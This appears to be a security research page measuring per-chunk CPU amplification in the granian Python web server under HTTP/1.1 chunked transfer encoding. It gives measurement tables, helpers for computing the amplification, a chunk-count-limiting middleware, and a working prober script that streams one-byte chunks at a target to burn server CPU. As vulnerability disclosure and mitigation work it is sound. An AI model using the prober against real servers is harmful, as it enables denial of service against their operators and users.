chunkloris: granian
part of the chunkloris per-chunk amplification survey. this page is the per-server record for granian under http/1.1 chunked transfer encoding.
at a glance
- server: granian 1.x
- runtime: python-3.12 (Rust core)
- ecosystem: python
- concurrency model: event-loop
- parser: Rust hyper internals exposed to Python
- delivery granularity: per-chunk
- chunk-limit helper: none exposed by the framework
- verdict: per-chunk. the parser/dispatcher boundary delivers one event per wire chunk, and cpu cost under paced mode b is measurable per chunk.
- scaling exponent (mode a): 1.02 (wall time vs N, log-log slope across common cells)
- scaling exponent (mode b): 1.00
- notes: despite the Rust core, the Rust→Python bridge adds a per-chunk cost, and granian ends up slower than pure-Python uvicorn-h11.
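the scaling exponents above are log-log slopes of wall time against N. a minimal sketch of that fit, assuming "common cells" means the three N values measured under both modes (50,000, 100,000 and 250,000) and an ordinary least-squares slope; loglog_slope is a hypothetical helper, not code from the reproducer. with the wall times from the measurements table it gives 1.02 for mode a and 1.00 for mode b.

```python
import math


def loglog_slope(ns, walls):
    """ordinary least-squares slope of ln(wall) against ln(N)."""
    xs = [math.log(n) for n in ns]
    ys = [math.log(w) for w in walls]
    mx = sum(xs) / len(xs)
    my = sum(ys) / len(ys)
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sxx = sum((x - mx) ** 2 for x in xs)
    return sxy / sxx


# N values present in both modes, with wall times copied from the measurements table
COMMON_N = [50_000, 100_000, 250_000]
WALL_MODE_A = [0.888, 1.951, 4.636]
WALL_MODE_B = [5.128, 10.244, 25.613]

print(f"mode a: {loglog_slope(COMMON_N, WALL_MODE_A):.2f}")  # mode a: 1.02
print(f"mode b: {loglog_slope(COMMON_N, WALL_MODE_B):.2f}")  # mode b: 1.00
```

a slope near 1.0 means total cost grows linearly with the number of chunks; a slope clearly above 1.0 would indicate per-chunk work that itself grows with N.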
measurements
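all cells ran in a 1-vcpu docker container. cpu cost is derived from the target container’s cgroup v2 cpu.stat usage_usec delta around each cell. the basis column records how µs / chunk was computed: server-cpu-cgroup rows divide that cpu time by N; wall rows, which have no server cpu figure, divide wall time by N.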
| mode | N | wall (s) | server cpu % | µs / chunk | basis | ok |
|---|---|---|---|---|---|---|
| A-bridge-coalesced | 50,000 | 0.888 | 104.6 | 18.570 | server-cpu-cgroup | ✓ |
| A-bridge-coalesced | 100,000 | 1.951 | 102.1 | 19.924 | server-cpu-cgroup | ✓ |
| A-bridge-coalesced | 250,000 | 4.636 | 100.1 | 18.569 | server-cpu-cgroup | ✓ |
| A-bridge-coalesced | 500,000 | 7.490 | — | 14.980 | wall | ✓ |
| A-bridge-coalesced | 1,000,000 | 14.400 | — | 14.400 | wall | ✓ |
| B-paced-100us | 50,000 | 5.128 | 22.1 | 22.720 | server-cpu-cgroup | ✓ |
| B-paced-100us | 100,000 | 10.244 | 21.7 | 22.219 | server-cpu-cgroup | ✓ |
| B-paced-100us | 250,000 | 25.613 | 22.8 | 23.391 | server-cpu-cgroup | ✓ |
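the cgroup-based measurement can be sketched as follows: read usage_usec from the target container's cgroup v2 cpu.stat before and after a cell, then divide the delta by N. the cpu.stat path is a caller-supplied assumption (it depends on the cgroup driver and container id), run_cell stands in for whatever drives one cell, and all function names here are hypothetical rather than taken from the reproducer.

```python
import time
from pathlib import Path


def parse_usage_usec(text):
    """extract the usage_usec counter from cgroup v2 cpu.stat contents."""
    for line in text.splitlines():
        key, _, value = line.partition(" ")
        if key == "usage_usec":
            return int(value)
    raise ValueError("usage_usec not found in cpu.stat")


def read_usage_usec(cpu_stat_path):
    return parse_usage_usec(Path(cpu_stat_path).read_text())


def measure_cell(cpu_stat_path, n_chunks, run_cell):
    """run one cell; return (wall_s, server_cpu_pct, us_per_chunk)."""
    before = read_usage_usec(cpu_stat_path)
    t0 = time.perf_counter()
    run_cell()  # hypothetical: send n_chunks chunks and wait for the response
    wall_s = time.perf_counter() - t0
    cpu_usec = read_usage_usec(cpu_stat_path) - before
    cpu_pct = 100.0 * (cpu_usec / 1e6) / wall_s
    return wall_s, cpu_pct, cpu_usec / n_chunks


def us_per_chunk_from_row(wall_s, n_chunks, cpu_pct=None):
    """recompute µs / chunk from a table row; wall basis when cpu_pct is None."""
    seconds = wall_s if cpu_pct is None else wall_s * cpu_pct / 100.0
    return seconds * 1e6 / n_chunks
```

recomputing from the rounded cpu % gives, for example, about 18.58 µs for the 50,000-chunk mode a row (table: 18.570) and 14.40 µs for the 1,000,000-chunk wall-basis row; the small gaps come from cpu % being rounded to one decimal.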
what this means
the parser/dispatcher path on this server delivers one event per chunked-transfer-encoding chunk, so an attacker who sends a body as N one-byte chunks consumes roughly N × (mode-b µs / chunk) of server cpu on a single core, about 22 to 23 µs per chunk in the measurements above. amplification scales linearly with N (both scaling exponents are ≈1.0) until the framework’s max_request_body_size (or equivalent) is hit.
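as a worked example of the N × (mode-b µs / chunk) estimate, the sketch below also counts the bytes the attacker puts on the wire. a one-byte chunk is framed as a hex size line, the data byte and a CRLF (`1\r\nx\r\n`, 6 bytes), and the body ends with a zero-size last chunk (`0\r\n\r\n`, 5 bytes, assuming no trailers). the per-chunk cost is taken from the 250,000-chunk mode b row; the helper names are hypothetical.

```python
def chunked_wire_bytes(n_chunks):
    """bytes on the wire for n one-byte chunks plus the last-chunk (no trailers)."""
    per_chunk = len(b"1\r\nx\r\n")  # size line "1\r\n" + data "x" + "\r\n" = 6 bytes
    last_chunk = len(b"0\r\n\r\n")  # zero-size chunk + empty trailer section = 5 bytes
    return n_chunks * per_chunk + last_chunk


def estimated_cpu_seconds(n_chunks, us_per_chunk):
    """server cpu estimate: N x (mode-b µs / chunk)."""
    return n_chunks * us_per_chunk / 1e6


N = 250_000
MODE_B_US_PER_CHUNK = 23.391  # from the 250,000-chunk mode b row

print(chunked_wire_bytes(N))  # 1500005
print(round(estimated_cpu_seconds(N, MODE_B_US_PER_CHUNK), 2))  # 5.85
```

so about 1.5 MB on the wire (250 KB of actual body data) buys roughly 5.8 s of server cpu, consistent with the measured 25.613 s × 22.8 % ≈ 5.84 s for that cell.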
what to do today
- if this server runs as an origin behind nginx with the default proxy_request_buffering on, the per-chunk attack shape does not reach this server: nginx delivers one content-length-framed body to the upstream in a single recv().
- if deployed direct-exposed, behind haproxy with default streaming, or behind nginx with proxy_request_buffering off (or any reverse proxy that streams request bodies), the per-chunk cost reaches this server.
- there is no framework-level chunk-count limit in the default config; use a frontend buffer, transport-layer rate limiting, or a wrapping middleware that imposes a chunk-count cap before draining the body.
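a wrapping middleware of the kind suggested above might look like this minimal ASGI sketch. it assumes, per the verdict, that each wire chunk surfaces as one http.request message, and that the wrapped app lets the exception propagate; the class names, the max_chunks default and the 413 response are illustrative choices, not a granian API. it only bounds how many chunk events the application drains: every chunk that is received still pays the Rust→Python bridge cost, so it caps the total rather than the per-chunk overhead.

```python
class TooManyChunks(Exception):
    """raised inside the wrapped receive() once the chunk cap is exceeded."""


class ChunkCountLimit:
    """hypothetical ASGI middleware that caps http.request messages per request."""

    def __init__(self, app, max_chunks=1024):
        self.app = app
        self.max_chunks = max_chunks  # illustrative default, tune per deployment

    async def __call__(self, scope, receive, send):
        if scope["type"] != "http":
            # lifespan and websocket scopes pass through untouched
            await self.app(scope, receive, send)
            return

        count = 0
        response_started = False

        async def limited_receive():
            nonlocal count
            message = await receive()
            if message["type"] == "http.request":
                count += 1  # assumed: one message per wire chunk on this server
                if count > self.max_chunks:
                    raise TooManyChunks()
            return message

        async def tracking_send(message):
            nonlocal response_started
            if message["type"] == "http.response.start":
                response_started = True
            await send(message)

        try:
            await self.app(scope, limited_receive, tracking_send)
        except TooManyChunks:
            if response_started:
                raise  # headers already sent; let the server abort the connection
            await send({
                "type": "http.response.start",
                "status": 413,
                "headers": [(b"content-type", b"text/plain")],
            })
            await send({"type": "http.response.body", "body": b"too many chunks\n"})
```

the application is wrapped before it is handed to granian, e.g. `app = ChunkCountLimit(app, max_chunks=1024)`; a cap well above the chunk counts legitimate clients send keeps normal streaming uploads working.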
reproducer
the full reproducer for this server is in the paper repo. the docker image pins granian 1.x, and the test container is constrained to a single cpu (--cpus=1). the prober script implements mode a (bridge-coalesced) and mode b (paced 100 µs) as described in the methodology section.
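for readers without the repo, a minimal stand-in for the sending side might look like this. it is not the paper's prober: it writes N one-byte chunks over a raw socket, optionally sleeping pace_s between writes, which approximates mode b only coarsely because time.sleep resolution near 100 µs is platform-dependent. open_probe and send_chunked are hypothetical names; TCP_NODELAY is set so that small writes are not held back by Nagle's algorithm.

```python
import socket
import time


def open_probe(host, port):
    """connect to the target and disable Nagle so each small write is sent promptly."""
    sock = socket.create_connection((host, port))
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    return sock


def send_chunked(sock, n_chunks, pace_s=0.0, host="localhost", path="/"):
    """send a POST whose body is n_chunks one-byte chunks; return elapsed wall seconds."""
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")
    t0 = time.perf_counter()
    sock.sendall(head)
    for _ in range(n_chunks):
        sock.sendall(b"1\r\nx\r\n")  # one chunk: size line, one data byte, CRLF
        if pace_s > 0:
            time.sleep(pace_s)  # coarse pacing; real sleeps often overshoot 100 µs
    sock.sendall(b"0\r\n\r\n")  # last-chunk, no trailers
    return time.perf_counter() - t0
```

a paced run would be `send_chunked(open_probe(host, port), 50_000, pace_s=100e-6)` with host and port pointing at the target, followed by reading the response until the server closes the connection; the elapsed time returned here covers sending only, not the response.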
see the draft pdf for the full per-framework discussion.